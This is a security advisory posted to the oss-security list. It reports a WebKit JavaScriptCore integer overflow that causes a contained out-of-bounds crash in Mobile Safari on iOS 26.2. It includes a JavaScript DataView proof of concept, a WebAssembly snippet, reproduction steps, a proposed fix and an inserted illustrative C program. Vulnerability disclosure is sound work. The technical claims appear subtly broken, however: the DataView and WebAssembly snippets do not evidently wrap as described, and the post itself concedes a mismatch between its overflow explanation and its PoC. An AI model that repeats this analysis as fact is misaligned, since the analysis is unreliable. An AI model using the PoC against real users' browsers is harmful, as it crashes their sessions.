Message-ID: <jq8xQxO7VyzQbtSsLz_p4DUzIOsf476KniI3gerokeyM90-zpczEWoWDiBQH0AYnpCr51vbCQX9qyBPuOqr20UplDsFlLbBRU0h2_swCBk4=@proton.me>
Date: Fri, 26 Dec 2025 21:57:26 +0000
From: Joseph Goydish II <newt0ns_law@...ton.me>
To: "oss-security@...ts.openwall.com" <oss-security@...ts.openwall.com>
Cc: Apple Product Security <product-security@...le.com>
Subject: [Advisory] WebKit/iOS 26.2: Gigacage Boundary Violation via Logic Flaw enabling OOB Access

[CVE Pending] WebKit JSC Integer Overflow – OOB Write via Gigacage (iOS 26.2)
--------------------------------------------------------------------
Full advisory, PoC, and logs:
[https://github.com/JGoyd/0day-GigaCage-Webkit]
--------------------------------------------------------------------
1. Executive Summary

A critical vulnerability exists in the WebKit JavaScriptCore (JSC)
engine: an integer overflow in memory offset calculations for
ArrayBuffer, TypedArray, and WebAssembly enables out-of-bounds
(OOB) memory access. Gigacage currently contains the impact by
terminating the process, but the underlying logic flaw could be used
for remote code execution if combined with a mitigation bypass.

--------------------------------------------------------------------
2. Environment Details

OS: iOS 26.2 (Build 23C55)
WebKit: 8623.1.14.10.9
Crash: EXC_GUARD (Namespace 31: Gigacage Primitive Partition)
Offset: 0xADD7476C
Device: iPhone15,3 (iPhone 14 Pro Max)
UUID: af25fa78-ae3e-3bf4-b320-4404d3a36a77

--------------------------------------------------------------------
3. Technical Analysis (CWE-190)

The vulnerability occurs during offset calculation for TypedArray and
DataView. If 'index * elementSize' wraps at the 32-bit boundary, the
wrapped value can pass the initial bounds check. When the access is
then resolved against the Gigacage base pointer, it can exceed the
16 GB cage boundary, triggering a guard violation.

The flaw is also reachable via the WebAssembly JIT, which may elide
bounds checks: wraparound in 32-bit address arithmetic permits
unsanitized JITed memory access.

--------------------------------------------------------------------
4. Proof of Concept (PoC)

JavaScript (DataView vector):

const buffer = new ArrayBuffer(1024);
const view = new DataView(buffer);
// 0xFFFFFFFE + 4 wraps at 32-bits
view.setUint32(0xFFFFFFFE, 0x41414141);

WebAssembly (JIT vector, text format; the load is wrapped in a minimal
module with one 64 KiB memory page so it can be assembled as is):

(module
  (memory 1)
  (func (export "load_wrapped") (result i32)
    ;; (i32.add (i32.const 0xFFFFFFFF) (i32.const 0x5)) wraps to 0x4
    (i32.load offset=0
      (i32.add (i32.const 0xFFFFFFFF) (i32.const 0x5)))))

Reproduction Steps:

1. Host the PoC HTML on an HTTPS server.
2. Open it in Mobile Safari on iOS 26.2.
3. Observe termination of the WebContent process.
4. Confirm offset 0xADD7476C in the crash log.

--------------------------------------------------------------------
5. Remediation

Implement checked arithmetic in the following components:

- Source/JavaScriptCore/runtime/JSArrayBufferView.cpp
- Source/JavaScriptCore/runtime/JSDataView.cpp

Proposed fix:

size_t byteOffset;
if (__builtin_mul_overflow(static_cast<size_t>(index),
                           m_elementSize, &byteOffset)) {
    return throwOverflowError();
}

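To make the arithmetic in sections 3 and 4 concrete, the following C
program (added here as an illustration; it is not WebKit's code, and
the function names are assumptions, not JSC identifiers) models both
bounds checks in 32-bit arithmetic next to the checked-arithmetic form
proposed above. The first pair models a DataView access whose
end-of-access 'index + elementSize' wraps, the case the PoC comment
describes; the second pair models a TypedArray access whose
'index * elementSize' wraps. The constructed view length of 1024 bytes
matches the PoC's buffer.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical models of the two bounds checks discussed in the advisory.
 * Names are assumptions for illustration, not JavaScriptCore's own. */

/* ---- DataView-style access: the index is already a byte offset ------ */

/* Flawed form (CWE-190): the end of the access is computed in 32-bit
 * arithmetic, so 0xFFFFFFFE + 4 wraps to 2 and satisfies end <= length. */
bool dataview_check_unchecked(uint32_t byte_index, uint32_t element_size,
                              uint32_t length)
{
    uint32_t end = byte_index + element_size;   /* wraps mod 2^32 */
    return end <= length;
}

/* Hardened form: the wrap is detected before any comparison. */
bool dataview_check_checked(uint32_t byte_index, uint32_t element_size,
                            uint32_t length)
{
    uint32_t end;
    if (__builtin_add_overflow(byte_index, element_size, &end))
        return false;                            /* overflow: reject */
    return end <= length;
}

/* ---- TypedArray-style access: byte offset = index * elementSize ----- */

/* Flawed form: the product wraps, e.g. 0x40000001 * 4 == 4 mod 2^32,
 * which passes the check although the real offset is 4 GiB + 4.
 * Returns the offset the flawed check accepts, or -1 when it rejects. */
int64_t typedarray_offset_unchecked(uint32_t index, uint32_t element_size,
                                    uint32_t length)
{
    uint32_t byte_offset = index * element_size;   /* wraps mod 2^32 */
    if (byte_offset > length || length - byte_offset < element_size)
        return -1;
    return byte_offset;
}

/* Hardened form, the shape of the remediation proposed above: checked
 * multiplication in size_t, then a checked end computation. */
int64_t typedarray_offset_checked(uint32_t index, uint32_t element_size,
                                  uint32_t length)
{
    size_t byte_offset, end;
    if (__builtin_mul_overflow((size_t)index, (size_t)element_size,
                               &byte_offset))
        return -1;                                /* product overflowed */
    if (__builtin_add_overflow(byte_offset, (size_t)element_size, &end))
        return -1;                                /* end overflowed */
    if (end > length)
        return -1;                                /* genuinely out of bounds */
    return (int64_t)byte_offset;
}

int main(void)
{
    const uint32_t length = 1024;   /* constructed: 1 KiB view, as in the PoC */

    printf("DataView setUint32(0xFFFFFFFE) on %u bytes: unchecked=%d checked=%d\n",
           length,
           dataview_check_unchecked(0xFFFFFFFEu, 4, length),
           dataview_check_checked(0xFFFFFFFEu, 4, length));

    printf("Uint32Array[0x40000001] on %u bytes: unchecked=%lld checked=%lld\n",
           length,
           (long long)typedarray_offset_unchecked(0x40000001u, 4, length),
           (long long)typedarray_offset_checked(0x40000001u, 4, length));

    /* An in-bounds access is accepted by both forms. */
    printf("Uint32Array[10]: unchecked=%lld checked=%lld\n",
           (long long)typedarray_offset_unchecked(10, 4, length),
           (long long)typedarray_offset_checked(10, 4, length));
    return 0;
}
```

One check worth noting when reading the PoC: with element size 4, the
32-bit product 0xFFFFFFFE * 4 is 0xFFFFFFF8, which still fails the
length comparison, so the DataView PoC depends on the end-of-access
addition wrapping (the first pair above) rather than on the
multiplication wrapping (the second pair).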
--------------------------------------------------------------------
6. Supporting Evidence

The same crash offset and namespace 31 guard violation appear in:

ExcUserFault_MobileSafari-2025-12-25-131432.ips
ExcUserFault_SafariViewService-2025-12-25-062945.ips

--------------------------------------------------------------------
7. Disclosure

Apple Security is being notified at the same time as this public
mailing list post, as they are CC'd on this email. This is not a
coordinated disclosure; notification to Apple and the broader
community is occurring simultaneously.

--------------------------------------------------------------------
8. Legal Disclaimer

Provided for authorized security research only.
Unauthorized use is prohibited and may be unlawful.

--------------------------------------------------------------------

Thank you,
Joseph Goydish II
